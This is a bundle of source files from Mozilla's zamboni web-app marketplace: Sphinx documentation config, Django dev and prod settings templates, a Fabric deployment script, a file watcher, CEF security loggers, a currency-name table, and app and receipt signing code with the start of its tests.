# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'zambonidoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'zamboni.tex', u'zamboni Documentation',
u'Jeff Balogh', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Intersphinx links to the local _intersphinx cache.
intersphinx_mapping = {
'http://docs.python.org/': 'python.inv',
'http://docs.djangoproject.com/en/dev': 'django.inv',
'http://jinja.pocoo.org/2/documentation/': 'jinja.inv',
'http://sphinx.pocoo.org/': 'jinja.inv',
'http://somethingaboutorange.com/mrl/projects/nose/0.11.1/': 'nose.inv',
}
for key, val in intersphinx_mapping.items():
intersphinx_mapping[key] = '_intersphinx/' + val
# Root url where source files can be browsed online.
src_base_url = 'http://github.com/mozilla/zamboni/tree/master/'
# https://github.com/snide/sphinx_rtd_theme
# on_rtd is whether we are on readthedocs.org, this line of code grabbed from
# docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
########NEW FILE########
__FILENAME__ = src_role
"""
Turn :src:`file.py` into a link to `file.py` in your online source browser.
Requires src_base_url to be set in conf.py.
"""
import urlparse
from docutils import nodes
def setup(app):
app.add_config_value('src_base_url', None, 'html')
app.add_role('src', src_role)
def src_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
base_url = inliner.document.settings.env.config.src_base_url
if base_url is None:
msg = inliner.reporter.error('src_base_url is not set', line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
ref = urlparse.urljoin(base_url, text)
rn = nodes.reference(rawtext, text, refuri=ref)
return [rn], []
########NEW FILE########
__FILENAME__ = settings_local.dev
from default.settings import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = DEBUG
# These apps are great during development.
INSTALLED_APPS += (
'debug_toolbar',
'django_extensions',
'fixture_magic',
)
# You want one of the caching backends. Dummy won't do any caching, locmem is
# cleared every time you restart the server, and memcached is what we run in
# production.
#CACHES = {
# 'default': {
# 'BACKEND': 'django.core.cache.backends.memcached.Memcached',
# 'LOCATION': 'localhost:11211',
# }
#}
# Here we use the LocMemCache backend from cache-machine, as it interprets the
# "0" timeout parameter of ``cache`` in the same way as the Memcached backend:
# as infinity. Django's LocMemCache backend interprets it as a "0 seconds"
# timeout (and thus doesn't cache at all).
CACHES = {
'default': {
'BACKEND': 'caching.backends.locmem.LocMemCache',
'LOCATION': 'zamboni',
}
}
# Caching is required for CSRF to work, please do not use the dummy cache.
DATABASES = {
'default': {
'NAME': 'zamboni',
'ENGINE': 'django.db.backends.mysql',
'USER': 'root',
'PASSWORD': '',
'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
'TEST_CHARSET': 'utf8',
'TEST_COLLATION': 'utf8_general_ci',
},
}
# Skip indexing ES to speed things up?
SKIP_SEARCH_INDEX = False
LOG_LEVEL = logging.DEBUG
HAS_SYSLOG = False
# For debug toolbar.
if DEBUG:
INTERNAL_IPS = ('127.0.0.1',)
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
DEBUG_TOOLBAR_CONFIG = {
'HIDE_DJANGO_SQL': False,
'INTERCEPT_REDIRECTS': False,
}
# If you're not running on SSL you'll want this to be False.
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_DOMAIN = None
# Run tasks immediately, don't try using the queue.
CELERY_ALWAYS_EAGER = True
# Disables custom routing in settings.py so that tasks actually run.
CELERY_ROUTES = {}
# Disable timeout code during development because it uses the signal module
# which can only run in the main thread. Celery uses threads in dev.
VALIDATOR_TIMEOUT = -1
# The user id to use when logging in tasks. You should set this to a user that
# exists in your site.
# TASK_USER_ID = 1
WEBAPPS_RECEIPT_KEY = os.path.join(ROOT, 'mkt/webapps/tests/sample.key')
# If you want to allow self-reviews for add-ons/apps, then enable this.
# In production we do not want to allow this.
ALLOW_SELF_REVIEWS = True
# For Marketplace payments.
APP_PURCHASE_KEY = 'localhost'
APP_PURCHASE_AUD = 'localhost'
APP_PURCHASE_TYP = 'mozilla-local/payments/pay/v1'
APP_PURCHASE_SECRET = 'This secret must match your webpay SECRET'
# Assuming you did `npm install` (and not `-g`) like you were supposed to,
# this will be the path to the `stylus` and `lessc` executables.
STYLUS_BIN = path('node_modules/stylus/bin/stylus')
LESS_BIN = path('node_modules/less/bin/lessc')
# Locally we typically don't run more than 1 elasticsearch node. So we set
# replicas to zero.
ES_DEFAULT_NUM_REPLICAS = 0
########NEW FILE########
__FILENAME__ = settings_local.prod
from settings import *
DEBUG = False
TEMPLATE_DEBUG = False
# The default database should point to the master.
DATABASES = {
'default': {
'NAME': 'zamboni',
'ENGINE': 'django.db.backends.mysql',
'HOST': '',
'PORT': '',
'USER': '',
'PASSWORD': '',
'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
},
'slave': {
'NAME': 'zamboni',
'ENGINE': 'django.db.backends.mysql',
'HOST': '',
'PORT': '',
'USER': '',
'PASSWORD': '',
'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
},
}
# Put the aliases for slave databases in this list.
SLAVE_DATABASES = ['slave']
# Use IP:PORT pairs separated by semicolons.
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': ['localhost:11211', 'localhost:11212'],
'TIMEOUT': 500,
}
}
# This is used to hash some things in Django.
SECRET_KEY = 'replace me with something long'
LOG_LEVEL = logging.WARNING
DEBUG_PROPAGATE_EXCEPTIONS = DEBUG
# Sample heka configuration. Uncommented, this would override what is in
# lib/settings_base.py.
# HEKA_CONF = {
# 'logger': 'zamboni',
# 'stream': {
# 'class': 'heka.streams.UdpStream',
# 'host': ['10.0.1.5', '10.0.1.10']
# 'port': 5566
# },
# 'plugins': {
# 'raven': ('heka_raven.raven_plugin.config_plugin',
# {'dsn': 'udp://username:[email protected]:9000/2'}),
# },
# }
#
# from heka.config import client_from_dict_config
# HEKA = client_from_dict_config(HEKA_CONF)
# If you want to allow self-reviews for add-ons/apps, then enable this.
# In production we do not want to allow this.
ALLOW_SELF_REVIEWS = False
########NEW FILE########
__FILENAME__ = watcher
"""
Watch a bunch of files and run a command if any changes are detected.
Usage
-----
::
python watcher.py 'echo changes' one.py two.py
To automatically keep Sphinx docs up to date::
python watcher.py 'make html' $(find . -name '*.rst')
Problems
--------
* The file checking would be way more efficient using inotify or whatever the
equivalent is on OS X.
* It doesn't handle bad input or spaces in filenames.
But it works for me.
"""
import os
import sys
import time
_mtimes = {}
def timecheck(files):
"""Return True if any of the files have changed."""
global _mtimes
for filename in files:
mtime = os.stat(filename).st_mtime
if filename not in _mtimes:
_mtimes[filename] = mtime
elif mtime != _mtimes[filename]:
_mtimes = {}
return True
else:
return False
def watcher(command, files):
"""Run ``command`` if any file in ``files`` changes."""
while True:
if timecheck(files):
os.system(command)
time.sleep(1)
def main():
command, files = sys.argv[1], sys.argv[2:]
try:
watcher(command, files)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
########NEW FILE########
__FILENAME__ = fabfile
import os
from os.path import join as pjoin
from fabric.api import (env, execute, lcd, local, parallel,
run, roles, task)
import fabdeploytools.envs
from fabdeploytools import helpers
import deploysettings as settings
env.key_filename = settings.SSH_KEY
fabdeploytools.envs.loadenv(settings.CLUSTER)
ROOT, ZAMBONI = helpers.get_app_dirs(__file__)
VIRTUALENV = pjoin(ROOT, 'venv')
PYTHON = pjoin(VIRTUALENV, 'bin', 'python')
def managecmd(cmd):
with lcd(ZAMBONI):
local('%s manage.py %s' % (PYTHON, cmd))
@task
def create_virtualenv(update_on_change=False):
helpers.create_venv(VIRTUALENV, settings.PYREPO,
pjoin(ZAMBONI, 'requirements/prod.txt'),
update_on_change=update_on_change)
if settings.LOAD_TESTING:
helpers.pip_install_reqs(pjoin(ZAMBONI, 'requirements/load.txt'))
@task
def update_locales():
with lcd(pjoin(ZAMBONI, 'locale')):
local("VENV=%s ./compile-mo.sh ." % VIRTUALENV)
@task
def loadtest(repo=''):
if hasattr(settings, 'MARTEAU'):
os.environ['MACAUTH_USER'] = settings.MARTEAU_USER
os.environ['MACAUTH_SECRET'] = settings.MARTEAU_SECRET
local('%s %s --server %s' % (settings.MARTEAU, repo,
settings.MARTEAU_SERVER))
@task
def update_products():
managecmd('update_product_details')
@task
def compress_assets(arg=''):
managecmd('compress_assets -t %s' % arg)
@task
def schematic():
with lcd(ZAMBONI):
local("%s %s/bin/schematic migrations" %
(PYTHON, VIRTUALENV))
@task
def update_info(ref='origin/master'):
helpers.git_info(ZAMBONI)
with lcd(ZAMBONI):
local("/bin/bash -c "
"'source /etc/bash_completion.d/git && __git_ps1'")
local('git show -s {0} --pretty="format:%h" '
'> media/git-rev.txt'.format(ref))
@task
def disable_cron():
local("rm -f /etc/cron.d/%s" % settings.CRON_NAME)
@task
def install_cron(installed_dir):
installed_zamboni_dir = os.path.join(installed_dir, 'zamboni')
installed_python = os.path.join(installed_dir, 'venv', 'bin', 'python')
with lcd(ZAMBONI):
local('%s ./scripts/crontab/gen-cron.py '
'-z %s -u %s -p %s > /etc/cron.d/.%s' %
(PYTHON, installed_zamboni_dir,
getattr(settings, 'CRON_USER', 'apache'),
installed_python, settings.CRON_NAME))
local('mv /etc/cron.d/.%s /etc/cron.d/%s' % (settings.CRON_NAME,
settings.CRON_NAME))
@task
@roles('celery')
@parallel
def update_celery():
restarts = []
if getattr(settings, 'CELERY_SERVICE_PREFIX', False):
restarts.extend(['supervisorctl restart {0}{1} &'.format(
settings.CELERY_SERVICE_PREFIX, x)
for x in ('', '-devhub', '-priority', '-limited')])
if getattr(settings, 'CELERY_SERVICE_MKT_PREFIX', False):
restarts.extend(['supervisorctl restart {0}{1} &'.format(
settings.CELERY_SERVICE_MKT_PREFIX, x)
for x in ('', '-devhub', '-priority', '-limited')])
if restarts:
run('%s wait' % ' '.join(restarts))
@task
def deploy():
rpmbuild = helpers.deploy(name='zamboni',
env=settings.ENV,
cluster=settings.CLUSTER,
domain=settings.DOMAIN,
root=ROOT,
deploy_roles=['web', 'celery'],
package_dirs=['zamboni', 'venv'])
helpers.restart_uwsgi(getattr(settings, 'UWSGI', []))
execute(update_celery)
execute(install_cron, rpmbuild.install_to)
managecmd('cron cleanup_validation_results')
@task
def deploy_web():
helpers.deploy(name='zamboni',
env=settings.ENV,
cluster=settings.CLUSTER,
domain=settings.DOMAIN,
root=ROOT,
use_yum=False,
package_dirs=['zamboni', 'venv'])
helpers.restart_uwsgi(getattr(settings, 'UWSGI', []))
@task
def pre_update(ref=settings.UPDATE_REF):
local('date')
execute(disable_cron)
execute(helpers.git_update, ZAMBONI, ref)
execute(update_info, ref)
@task
def update():
execute(create_virtualenv, getattr(settings, 'DEV', False))
execute(update_locales)
execute(update_products)
execute(compress_assets, arg='--settings=settings_local_mkt')
execute(schematic)
managecmd('dump_apps')
managecmd('statsd_ping --key=update')
@task
def pre_update_latest_tag():
current_tag_file = os.path.join(ZAMBONI, '.tag')
latest_tag = helpers.git_latest_tag(ZAMBONI)
with open(current_tag_file, 'r+') as f:
if f.read() == latest_tag:
print 'Environemnt is at %s' % latest_tag
else:
pre_update(latest_tag)
f.seek(0)
f.write(latest_tag)
f.truncate()
########NEW FILE########
__FILENAME__ = cef_loggers
"""Our app specific CEF loggers."""
from django.conf import settings
from django.http import HttpRequest
from cef import log_cef as _log_cef
heka = settings.HEKA
class CEFLogger:
"""Abstract base CEF logger.
Class attributes to set in a concrete class:
**sig_prefix**
Prefix to the CEF signature. Example: RECEIPT
**cs2label**
cs2label parameter. Example: ReceiptTransaction
**msg_prefix**
Prefix to all CEF log messages. Example: Receipt
**default_severity**
If set, this should be a 0-10 int.
"""
sig_prefix = ''
cs2label = None
msg_prefix = ''
default_severity = None
def log(self, environ, app, msg, longer, severity=None,
extra_kwargs=None):
"""Log something important using the CEF library.
Parameters:
**environ**
Typically a Django request object. It can also be
a plain dict.
**app**
An app/addon object.
**msg**
A short message about the incident.
**longer**
A more description message about the incident.
**severity=None**
A 0-10 int to override the default severity.
**extra_kwargs**
A dict to override anything sent to the CEF library.
"""
c = {'cef.product': getattr(settings, 'CEF_PRODUCT', 'AMO'),
'cef.vendor': getattr(settings, 'CEF_VENDOR', 'Mozilla'),
'cef.version': getattr(settings, 'CEF_VERSION', '0'),
'cef.device_version': getattr(settings,
'CEF_DEVICE_VERSION',
'0'),
'cef.file': getattr(settings, 'CEF_FILE', 'syslog'), }
user = getattr(environ, 'amo_user', None)
# Sometimes app is a string, eg: "unknown". Boo!
try:
app_str = app.pk
except AttributeError:
app_str = app
kwargs = {'username': getattr(user, 'name', ''),
'suid': str(getattr(user, 'pk', '')),
'signature': '%s%s' % (self.sig_prefix, msg.upper()),
'msg': longer, 'config': c,
# Until the CEF log can cope with unicode app names, just
# use primary keys.
'cs2': app_str, 'cs2Label': self.cs2label}
if extra_kwargs:
kwargs.update(extra_kwargs)
if not severity:
severity = self.default_severity
if not severity:
raise ValueError('CEF severity was not defined')
if isinstance(environ, HttpRequest):
environ = environ.META.copy()
if settings.USE_HEKA_FOR_CEF:
return heka.cef('%s %s' % (self.msg_prefix, msg), severity,
environ, **kwargs)
else:
return _log_cef('%s %s' % (self.msg_prefix, msg),
severity, environ, **kwargs)
class ReceiptCEFLogger(CEFLogger):
sig_prefix = 'RECEIPT'
cs2label = 'ReceiptTransaction'
msg_prefix = 'Receipt'
default_severity = 5
receipt_cef = ReceiptCEFLogger()
class AppPayCEFLogger(CEFLogger):
"""
Anything to do with app payments.
"""
sig_prefix = 'APP_PAY'
cs2label = 'AppPayment'
msg_prefix = 'AppPayment'
default_severity = 5
app_pay_cef = AppPayCEFLogger()
########NEW FILE########
__FILENAME__ = constants
# -*- coding: utf8 -*-
from tower import ugettext_lazy as _lazy
ALL_CURRENCIES = {
'AED': _lazy(u'United Arab Emirates Dirham'),
'AFN': _lazy(u'Afghanistan Afghani'),
'ALL': _lazy(u'Albania Lek'),
'AMD': _lazy(u'Armenia Dram'),
'ANG': _lazy(u'Netherlands Antilles Guilder'),
'AOA': _lazy(u'Angola Kwanza'),
'ARS': _lazy(u'Argentina Peso'),
'AUD': _lazy(u'Australia Dollar'),
'AWG': _lazy(u'Aruba Guilder'),
'AZN': _lazy(u'Azerbaijan New Manat'),
'BAM': _lazy(u'Bosnia and Herzegovina Convertible Marka'),
'BBD': _lazy(u'Barbados Dollar'),
'BDT': _lazy(u'Bangladesh Taka'),
'BGN': _lazy(u'Bulgaria Lev'),
'BHD': _lazy(u'Bahrain Dinar'),
'BIF': _lazy(u'Burundi Franc'),
'BMD': _lazy(u'Bermuda Dollar'),
'BND': _lazy(u'Brunei Darussalam Dollar'),
'BOB': _lazy(u'Bolivia Boliviano'),
'BRL': _lazy(u'Brazil Real'),
'BSD': _lazy(u'Bahamas Dollar'),
'BTN': _lazy(u'Bhutan Ngultrum'),
'BWP': _lazy(u'Botswana Pula'),
'BYR': _lazy(u'Belarus Ruble'),
'BZD': _lazy(u'Belize Dollar'),
'CAD': _lazy(u'Canada Dollar'),
'CDF': _lazy(u'Congo/Kinshasa Franc'),
'CHF': _lazy(u'Switzerland Franc'),
'CLP': _lazy(u'Chile Peso'),
'CNY': _lazy(u'China Yuan Renminbi'),
'COP': _lazy(u'Colombia Peso'),
'CRC': _lazy(u'Costa Rica Colon'),
'CUC': _lazy(u'Cuba Convertible Peso'),
'CUP': _lazy(u'Cuba Peso'),
'CVE': _lazy(u'Cape Verde Escudo'),
'CZK': _lazy(u'Czech Republic Koruna'),
'DJF': _lazy(u'Djibouti Franc'),
'DKK': _lazy(u'Denmark Krone'),
'DOP': _lazy(u'Dominican Republic Peso'),
'DZD': _lazy(u'Algeria Dinar'),
'EGP': _lazy(u'Egypt Pound'),
'ERN': _lazy(u'Eritrea Nakfa'),
'ETB': _lazy(u'Ethiopia Birr'),
'EUR': _lazy(u'Euro Member Countries'),
'FJD': _lazy(u'Fiji Dollar'),
'FKP': _lazy(u'Falkland Islands (Malvinas) Pound'),
'GBP': _lazy(u'United Kingdom Pound'),
'GEL': _lazy(u'Georgia Lari'),
'GGP': _lazy(u'Guernsey Pound'),
'GHS': _lazy(u'Ghana Cedi'),
'GIP': _lazy(u'Gibraltar Pound'),
'GMD': _lazy(u'Gambia Dalasi'),
'GNF': _lazy(u'Guinea Franc'),
'GTQ': _lazy(u'Guatemala Quetzal'),
'GYD': _lazy(u'Guyana Dollar'),
'HKD': _lazy(u'Hong Kong Dollar'),
'HNL': _lazy(u'Honduras Lempira'),
'HRK': _lazy(u'Croatia Kuna'),
'HTG': _lazy(u'Haiti Gourde'),
'HUF': _lazy(u'Hungary Forint'),
'IDR': _lazy(u'Indonesia Rupiah'),
'ILS': _lazy(u'Israel Shekel'),
'IMP': _lazy(u'Isle of Man Pound'),
'INR': _lazy(u'India Rupee'),
'IQD': _lazy(u'Iraq Dinar'),
'IRR': _lazy(u'Iran Rial'),
'ISK': _lazy(u'Iceland Krona'),
'JEP': _lazy(u'Jersey Pound'),
'JMD': _lazy(u'Jamaica Dollar'),
'JOD': _lazy(u'Jordan Dinar'),
'JPY': _lazy(u'Japan Yen'),
'KES': _lazy(u'Kenya Shilling'),
'KGS': _lazy(u'Kyrgyzstan Som'),
'KHR': _lazy(u'Cambodia Riel'),
'KMF': _lazy(u'Comoros Franc'),
'KPW': _lazy(u'Korea (North) Won'),
'KRW': _lazy(u'Korea (South) Won'),
'KWD': _lazy(u'Kuwait Dinar'),
'KYD': _lazy(u'Cayman Islands Dollar'),
'KZT': _lazy(u'Kazakhstan Tenge'),
'LAK': _lazy(u'Laos Kip'),
'LBP': _lazy(u'Lebanon Pound'),
'LKR': _lazy(u'Sri Lanka Rupee'),
'LRD': _lazy(u'Liberia Dollar'),
'LSL': _lazy(u'Lesotho Loti'),
'LTL': _lazy(u'Lithuania Litas'),
'LVL': _lazy(u'Latvia Lat'),
'LYD': _lazy(u'Libya Dinar'),
'MAD': _lazy(u'Morocco Dirham'),
'MDL': _lazy(u'Moldova Leu'),
'MGA': _lazy(u'Madagascar Ariary'),
'MKD': _lazy(u'Macedonia Denar'),
'MMK': _lazy(u'Myanmar (Burma) Kyat'),
'MNT': _lazy(u'Mongolia Tughrik'),
'MOP': _lazy(u'Macau Pataca'),
'MRO': _lazy(u'Mauritania Ouguiya'),
'MUR': _lazy(u'Mauritius Rupee'),
'MVR': _lazy(u'Maldives (Maldive Islands) Rufiyaa'),
'MWK': _lazy(u'Malawi Kwacha'),
'MXN': _lazy(u'Mexico Peso'),
'MYR': _lazy(u'Malaysia Ringgit'),
'MZN': _lazy(u'Mozambique Metical'),
'NAD': _lazy(u'Namibia Dollar'),
'NGN': _lazy(u'Nigeria Naira'),
'NIO': _lazy(u'Nicaragua Cordoba'),
'NOK': _lazy(u'Norway Krone'),
'NPR': _lazy(u'Nepal Rupee'),
'NZD': _lazy(u'New Zealand Dollar'),
'OMR': _lazy(u'Oman Rial'),
'PAB': _lazy(u'Panama Balboa'),
'PEN': _lazy(u'Peru Nuevo Sol'),
'PGK': _lazy(u'Papua New Guinea Kina'),
'PHP': _lazy(u'Philippines Peso'),
'PKR': _lazy(u'Pakistan Rupee'),
'PLN': _lazy(u'Poland Zloty'),
'PYG': _lazy(u'Paraguay Guarani'),
'QAR': _lazy(u'Qatar Riyal'),
'RON': _lazy(u'Romania New Leu'),
'RSD': _lazy(u'Serbia Dinar'),
'RUB': _lazy(u'Russia Ruble'),
'RWF': _lazy(u'Rwanda Franc'),
'SAR': _lazy(u'Saudi Arabia Riyal'),
'SBD': _lazy(u'Solomon Islands Dollar'),
'SCR': _lazy(u'Seychelles Rupee'),
'SDG': _lazy(u'Sudan Pound'),
'SEK': _lazy(u'Sweden Krona'),
'SGD': _lazy(u'Singapore Dollar'),
'SHP': _lazy(u'Saint Helena Pound'),
'SLL': _lazy(u'Sierra Leone Leone'),
'SOS': _lazy(u'Somalia Shilling'),
'SPL': _lazy(u'Seborga Luigino'),
'SRD': _lazy(u'Suriname Dollar'),
'STD': _lazy(u'São Tomé and Príncipe Dobra'),
'SVC': _lazy(u'El Salvador Colon'),
'SYP': _lazy(u'Syria Pound'),
'SZL': _lazy(u'Swaziland Lilangeni'),
'THB': _lazy(u'Thailand Baht'),
'TJS': _lazy(u'Tajikistan Somoni'),
'TMT': _lazy(u'Turkmenistan Manat'),
'TND': _lazy(u'Tunisia Dinar'),
'TOP': _lazy("Tonga Pa'anga"),
'TRY': _lazy(u'Turkey Lira'),
'TTD': _lazy(u'Trinidad and Tobago Dollar'),
'TVD': _lazy(u'Tuvalu Dollar'),
'TWD': _lazy(u'Taiwan New Dollar'),
'TZS': _lazy(u'Tanzania Shilling'),
'UAH': _lazy(u'Ukraine Hryvna'),
'UGX': _lazy(u'Uganda Shilling'),
'USD': _lazy(u'United States Dollar'),
'UYU': _lazy(u'Uruguay Peso'),
'UZS': _lazy(u'Uzbekistan Som'),
'VEF': _lazy(u'Venezuela Bolivar'),
'VND': _lazy(u'Viet Nam Dong'),
'VUV': _lazy(u'Vanuatu Vatu'),
'WST': _lazy(u'Samoa Tala'),
'XAF': _lazy(u'Communauté Financière Africaine (BEAC) CFA Franc BEAC'),
'XCD': _lazy(u'East Caribbean Dollar'),
'XDR': _lazy(u'International Monetary Fund (IMF) Special Drawing Rights'),
'XOF': _lazy(u'Communauté Financière Africaine (BCEAO) Franc'),
'XPF': _lazy(u'Comptoirs Français du Pacifique (CFP) Franc'),
'YER': _lazy(u'Yemen Rial'),
'ZAR': _lazy(u'South Africa Rand'),
'ZMW': _lazy(u'Zambia Kwacha'),
'ZWD': _lazy(u'Zimbabwe Dollar')
}
########NEW FILE########
__FILENAME__ = packaged
import json
import os
import shutil
import tempfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from base64 import b64decode
from celeryutils import task
import commonware.log
from django_statsd.clients import statsd
from signing_clients.apps import JarExtractor
import requests
import amo
from versions.models import Version
log = commonware.log.getLogger('z.crypto')
class SigningError(Exception):
pass
def sign_app(src, dest, ids, reviewer=False):
tempname = tempfile.mktemp()
try:
return _sign_app(src, dest, ids, reviewer, tempname)
finally:
try:
os.unlink(tempname)
except OSError:
# If the file has already been removed, don't worry about it.
pass
def _sign_app(src, dest, ids, reviewer, tempname):
"""
Generate a manifest and signature and send signature to signing server to
be signed.
"""
active_endpoint = _get_endpoint(reviewer)
timeout = settings.SIGNED_APPS_SERVER_TIMEOUT
if not active_endpoint:
_no_sign(src, dest)
return
# Extract necessary info from the archive
try:
jar = JarExtractor(
storage.open(src, 'r'), tempname,
ids,
omit_signature_sections=settings.SIGNED_APPS_OMIT_PER_FILE_SIGS)
except:
log.error('Archive extraction failed. Bad archive?', exc_info=True)
raise SigningError('Archive extraction failed. Bad archive?')
log.info('App signature contents: %s' % jar.signatures)
log.info('Calling service: %s' % active_endpoint)
try:
with statsd.timer('services.sign.app'):
response = requests.post(active_endpoint, timeout=timeout,
files={'file': ('zigbert.sf',
str(jar.signatures))})
except requests.exceptions.HTTPError, error:
# Will occur when a 3xx or greater code is returned.
log.error('Posting to app signing failed: %s, %s' % (
error.response.status, error))
raise SigningError('Posting to app signing failed: %s, %s' % (
error.response.status, error))
except:
# Will occur when some other error occurs.
log.error('Posting to app signing failed', exc_info=True)
raise SigningError('Posting to app signing failed')
if response.status_code != 200:
log.error('Posting to app signing failed: %s' % response.reason)
raise SigningError('Posting to app signing failed: %s'
% response.reason)
pkcs7 = b64decode(json.loads(response.content)['zigbert.rsa'])
try:
jar.make_signed(pkcs7)
except:
log.error('App signing failed', exc_info=True)
raise SigningError('App signing failed')
with storage.open(dest, 'w') as destf:
tempf = open(tempname)
shutil.copyfileobj(tempf, destf)
def _get_endpoint(reviewer=False):
"""
Returns the proper API endpoint depending whether we are signing for
reviewer or for public consumption.
"""
active = (settings.SIGNED_APPS_REVIEWER_SERVER_ACTIVE if reviewer else
settings.SIGNED_APPS_SERVER_ACTIVE)
server = (settings.SIGNED_APPS_REVIEWER_SERVER if reviewer else
settings.SIGNED_APPS_SERVER)
if active:
if not server:
# If no API endpoint is set. Just ignore this request.
raise ValueError(
'Invalid config. The %sserver setting is empty.' % (
'reviewer ' if reviewer else ''))
return server + '/1.0/sign_app'
def _no_sign(src, dest):
# If this is a local development instance, just copy the file around
# so that everything seems to work locally.
log.info('Not signing the app, no signing server is active.')
dest_dir = os.path.dirname(dest)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
shutil.copy(src, dest)
@task
def sign(version_id, reviewer=False, resign=False, **kw):
version = Version.objects.get(pk=version_id)
app = version.addon
log.info('Signing version: %s of app: %s' % (version_id, app))
if not app.type == amo.ADDON_WEBAPP:
log.error('[Webapp:%s] Attempt to sign something other than an app.' %
app.id)
raise SigningError('Not an app')
if not app.is_packaged:
log.error('[Webapp:%s] Attempt to sign a non-packaged app.' % app.id)
raise SigningError('Not packaged')
try:
file_obj = version.all_files[0]
except IndexError:
log.error(
'[Webapp:%s] Attempt to sign an app with no files in version.' %
app.id)
raise SigningError('No file')
path = (file_obj.signed_reviewer_file_path if reviewer else
file_obj.signed_file_path)
if storage.exists(path) and not resign:
log.info('[Webapp:%s] Already signed app exists.' % app.id)
return path
ids = json.dumps({
'id': app.guid,
'version': version_id
})
with statsd.timer('services.sign.app'):
try:
sign_app(file_obj.file_path, path, ids, reviewer)
except SigningError:
log.info('[Webapp:%s] Signing failed' % app.id)
if storage.exists(path):
storage.delete(path)
raise
log.info('[Webapp:%s] Signing complete.' % app.id)
return path
########NEW FILE########
__FILENAME__ = receipt
import json
import urllib2
from django.conf import settings
from django_statsd.clients import statsd
import commonware.log
import jwt
log = commonware.log.getLogger('z.crypto')
class SigningError(Exception):
pass
def sign(receipt):
"""
Send the receipt to the signing service.
This could possibly be made async via celery.
"""
# If no destination is set. Just ignore this request.
if not settings.SIGNING_SERVER:
return ValueError('Invalid config. SIGNING_SERVER empty.')
destination = settings.SIGNING_SERVER + '/1.0/sign'
timeout = settings.SIGNING_SERVER_TIMEOUT
receipt_json = json.dumps(receipt)
log.info('Calling service: %s' % destination)
log.info('Receipt contents: %s' % receipt_json)
headers = {'Content-Type': 'application/json'}
data = receipt if isinstance(receipt, basestring) else receipt_json
request = urllib2.Request(destination, data, headers)
try:
with statsd.timer('services.sign.receipt'):
response = urllib2.urlopen(request, timeout=timeout)
except urllib2.HTTPError, error:
# Will occur when a 3xx or greater code is returned
msg = error.read().strip()
log.error('Posting to receipt signing failed: %s, %s'
% (error.code, msg))
raise SigningError('Posting to receipt signing failed: %s, %s'
% (error.code, msg))
except:
# Will occur when some other error occurs.
log.error('Posting to receipt signing failed', exc_info=True)
raise SigningError('Posting receipt signing failed')
if response.getcode() != 200:
log.error('Posting to signing failed: %s'
% (response.getcode()))
raise SigningError('Posting to signing failed: %s'
% (response.getcode()))
return json.loads(response.read())['receipt']
def decode(receipt):
"""
Decode and verify that the receipt is sound from a crypto point of view.
Will raise errors if the receipt is not valid, returns receipt contents
if it is valid.
"""
raise NotImplementedError
def crack(receipt):
"""
Crack open the receipt, without checking that the crypto is valid.
Returns a list of all the elements of a receipt, which by default is
cert, receipt.
"""
return map(lambda x: jwt.decode(x.encode('ascii'), verify=False),
receipt.split('~'))
########NEW FILE########
__FILENAME__ = tests
# -*- coding: utf-8 -*-
import json
import os
import shutil
import zipfile
from django.conf import settings # For mocking.
from django.core.files.storage import default_storage as storage
import jwt
import mock
from nose.tools import eq_, raises
import amo.tests
from lib.crypto import packaged
from lib.crypto.receipt import crack, sign, SigningError
from mkt.webapps.models import Webapp
from versions.models import Version
from mkt.site.fixtures import fixture
def mock_sign(version_id, reviewer=False):
"""
This is a mock for using in tests, where we really don't want to be
actually signing the apps. This just copies the file over and returns
the path. It doesn't have much error checking.
"""
version = Version.objects.get(pk=version_id)
file_obj = version.all_files[0]
path = (file_obj.signed_reviewer_file_path if reviewer else
file_obj.signed_file_path)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
shutil.copyfile(file_obj.file_path, path)
return path
